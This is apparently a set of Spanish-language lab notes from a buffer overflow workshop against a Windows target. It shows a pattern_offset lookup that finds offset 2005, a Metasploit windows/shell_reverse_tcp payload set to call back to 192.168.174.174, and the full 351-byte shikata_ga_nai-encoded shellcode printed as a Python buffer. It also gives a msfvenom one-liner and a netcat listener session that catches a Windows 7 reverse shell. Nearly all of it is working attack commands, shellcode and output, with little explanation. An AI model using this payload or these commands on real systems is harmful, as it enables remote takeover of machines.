Obtencion del offset

./pattern_offset.rb -l 3000 -q 6f43386f
[*] Exact match at offset 2005

Configuracion del Payload

msf payload(windows/shell_reverse_tcp) > set lhost 192.168.174.174
lhost => 192.168.174.174
msf payload(windows/shell_reverse_tcp) > show options 

Module options (payload/windows/shell_reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.174.174  yes       The listen address
   LPORT     4444             yes       The listen port


1ra manera de crear el payload encodeado
msf payload(windows/shell_reverse_tcp) > generate -b '\x00' -t python
# windows/shell_reverse_tcp - 351 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, LHOST=192.168.174.174, LPORT=4444, 
# ReverseAllowProxy=false, ReverseListenerThreaded=false, 
# StagerRetryCount=10, StagerRetryWait=5, 
# PrependMigrate=false, EXITFUNC=process
buf =  ""
buf += "\xb8\x60\xdb\x29\xd9\xdb\xd1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x52\x31\x47\x12\x83\xef\xfc\x03\x27\xd5\xcb"
buf += "\x2c\x5b\x01\x89\xcf\xa3\xd2\xee\x46\x46\xe3\x2e\x3c"
buf += "\x03\x54\x9f\x36\x41\x59\x54\x1a\x71\xea\x18\xb3\x76"
buf += "\x5b\x96\xe5\xb9\x5c\x8b\xd6\xd8\xde\xd6\x0a\x3a\xde"
buf += "\x18\x5f\x3b\x27\x44\x92\x69\xf0\x02\x01\x9d\x75\x5e"
buf += "\x9a\x16\xc5\x4e\x9a\xcb\x9e\x71\x8b\x5a\x94\x2b\x0b"
buf += "\x5d\x79\x40\x02\x45\x9e\x6d\xdc\xfe\x54\x19\xdf\xd6"
buf += "\xa4\xe2\x4c\x17\x09\x11\x8c\x50\xae\xca\xfb\xa8\xcc"
buf += "\x77\xfc\x6f\xae\xa3\x89\x6b\x08\x27\x29\x57\xa8\xe4"
buf += "\xac\x1c\xa6\x41\xba\x7a\xab\x54\x6f\xf1\xd7\xdd\x8e"
buf += "\xd5\x51\xa5\xb4\xf1\x3a\x7d\xd4\xa0\xe6\xd0\xe9\xb2"
buf += "\x48\x8c\x4f\xb9\x65\xd9\xfd\xe0\xe1\x2e\xcc\x1a\xf2"
buf += "\x38\x47\x69\xc0\xe7\xf3\xe5\x68\x6f\xda\xf2\x8f\x5a"
buf += "\x9a\x6c\x6e\x65\xdb\xa5\xb5\x31\x8b\xdd\x1c\x3a\x40"
buf += "\x1d\xa0\xef\xc7\x4d\x0e\x40\xa8\x3d\xee\x30\x40\x57"
buf += "\xe1\x6f\x70\x58\x2b\x18\x1b\xa3\xbc\xe7\x74\x05\x92"
buf += "\x80\x86\x59\xfa\x0c\x0e\xbf\x96\xbc\x46\x68\x0f\x24"
buf += "\xc3\xe2\xae\xa9\xd9\x8f\xf1\x22\xee\x70\xbf\xc2\x9b"
buf += "\x62\x28\x23\xd6\xd8\xff\x3c\xcc\x74\x63\xae\x8b\x84"
buf += "\xea\xd3\x03\xd3\xbb\x22\x5a\xb1\x51\x1c\xf4\xa7\xab"
buf += "\xf8\x3f\x63\x70\x39\xc1\x6a\xf5\x05\xe5\x7c\xc3\x86"
buf += "\xa1\x28\x9b\xd0\x7f\x86\x5d\x8b\x31\x70\x34\x60\x98"
buf += "\x14\xc1\x4a\x1b\x62\xce\x86\xed\x8a\x7f\x7f\xa8\xb5"
buf += "\xb0\x17\x3c\xce\xac\x87\xc3\x05\x75\xb7\x89\x07\xdc"
buf += "\x50\x54\xd2\x5c\x3d\x67\x09\xa2\x38\xe4\xbb\x5b\xbf"
buf += "\xf4\xce\x5e\xfb\xb2\x23\x13\x94\x56\x43\x80\x95\x72"
msf payload(windows/shell_reverse_tcp) > 

2 da manera para crear el paylaod encodeado
root@kali:~# msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -b '\x00' lport=9999 lhost=192.168.174.176 -f python

root@kali:~/Escritorio# nc -lvp 4444
listening on [any] 4444 ...
192.168.174.176: inverse host lookup failed: Unknown host
connect to [192.168.174.174] from (UNKNOWN) [192.168.174.176] 49206
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Users\exploit\Desktop\Taller\Server>


